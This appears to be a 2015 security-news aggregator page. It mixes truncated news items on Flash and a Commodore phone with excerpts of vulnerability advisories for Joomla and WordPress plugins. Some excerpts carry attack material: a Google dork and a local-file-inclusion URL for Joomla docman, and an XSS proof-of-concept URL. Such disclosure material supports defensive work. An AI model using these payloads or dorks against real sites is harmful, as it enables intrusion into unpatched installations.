Google Chrome also disables Flash: flaws discovered by Hacking Team

16 July 2015 - Source: http://www.mondounix.com

After Firefox, Chrome too is disabling support for Adobe Flash, the popular video player which, after the attack on Hacking Team, has revealed a series of flaws exploitable by hackers. "Flash is a walking corpse; it has had vulnerabilities for many years. We have to acknowledge that it is a finished program," Matteo Flora, a computer scientist and security expert, told ANSA.

The deactivations on two widely used search engines such as Chrome and Firefox come a few days after statements by Facebook's head of security, Alex Stamos, who asked Adobe...


Commodore PET returns as a nostalgia-powered Android phone

16 July 2015 - Source: http://www.mondounix.com

If the name "Commodore" conjures up images of clicking keyboards, beige boxes, and blinking command lines rather than buttery smooth ballads, this one's for you. Yes, that mainstay of '80s home computing is back, this time as a mobile phone. The Commodore PET—which shares its name with the iconic all-in-one computer released in 1977—might not run Commodore BASIC, but it does feature a customised version of Android 5.0 Lollipop, a 5.5-inch 1080p IPS display, and a pair of emulators for running old Commodore software.

OK, so the two Italian entrepreneurs behind the PET might be playing on nostalgia just a tad in order to...


Joomla Docman Path Disclosure / Local File Inclusion

16 July 2015 - Source: http://www.mondounix.com
# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
 
# Xploit (FPD): 
 
 Pick one target and request the download with a blank parameter:
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 The server's full path is disclosed in the page title.
 
# Xploit (LFD/LFI):
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
...


WordPress Image Export 1.1 Arbitrary File Download

16 July 2015 - Source: http://www.mondounix.com
Title: Remote file download vulnerability in WordPress plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator.
Vulnerability:
The code in file download.php doesn't check that the user is requesting files from the uploaded images directory only. Line 8 also attempts to unlink the file after it has been downloaded. This script could be used to delete files out of the WordPress directory if file permissions allow.
 
      1 <?php
     ...


WordPress Plotly 1.0.2 Cross Site Scripting

16 July 2015 - Source: http://www.mondounix.com
Details
================
Software: Plotly
Version: 1.0.2
Homepage: http://wordpress.org/plugins/wp-plotly/
Advisory report: https://security.dxw.com/advisories/stored-xss-in-plotly-allows-less-privileged-users-to-insert-arbitrary-javascript-into-posts/
CVE: CVE-2015-5484
CVSS: 6.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Description
================
Stored XSS in Plotly allows less privileged users to insert arbitrary JavaScript into posts
 
Vulnerability
================
This plugin allows users who do not have the unfiltered_html capability to insert JavaScript into posts/pages which gets executed by the browsers of other users.
On single sites, only Administrators have the unfiltered_html capability, and on multisite,...


WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

16 July 2015 - Source: http://www.mondounix.com
Title: Remote file upload vulnerability & SQLi in WordPress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible with iPhones and iPads. It also allows us to use it as a widget. You can also enable this Powerplay Gallery on your WordPress site by placing a code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad...


WordPress Floating Social Bar 1.1.5 Cross Site Scripting

16 July 2015 - Source: http://www.mondounix.com
# Exploit Title: Floating Social Bar 1.1.5 XSS
# Date: 09-01-2015
# Software Link: https://wordpress.org/plugins/floating-social-bar/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
 
Everyone can access save_order().
 
File: floating-social-bar\class-floating-social-bar.php
 
add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) );
 
$_REQUEST['items'] is not escaped.
 
http://security.szurek.pl/floating-social-bar-115-xss.html
 
2. Proof of Concept
 
http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="><script>alert("XSS");</script>
 
XSS...


Adobe promises Flash improvements after Firefox and Facebook snubs

15 July 2015 - Source: http://www.mondounix.com

Adobe has promised to do all it can to improve the security of its much maligned Flash tool, in response to criticisms from the new CIO of Facebook and Mozilla blocking the tool from its Firefox browser.

In a blog post by Adobe the company said it was working hard to fix issues that are coming to light since data was leaked from the server of Italian surveillance software firm Hacking Team.

It went on to say that because Flash is so widely used it is naturally a target for hackers, but that it is confident it can maintain an adequate level of security for the product.

"Flash Player is one of the most...


WordPress Twenty Fifteen 4.2.1 Cross Site Scripting

13 July 2015 - Source: http://www.mondounix.com
Information
--------------------
Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and
https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007
 
Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the...


WordPress PictoBrowser 0.3.1 CSRF / XSS

13 July 2015 - Source: http://www.mondounix.com
**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in PictoBrowser WordPress Plugin
# Author: Manideep K  
# CVE-ID: CVE-2014-9392
# Plugin Homepage: https://wordpress.org/plugins/pictobrowser-gallery/
# Version Affected: 0.3.1 (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all text boxes, to name one - pictoBrowserFlickrUser
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning...
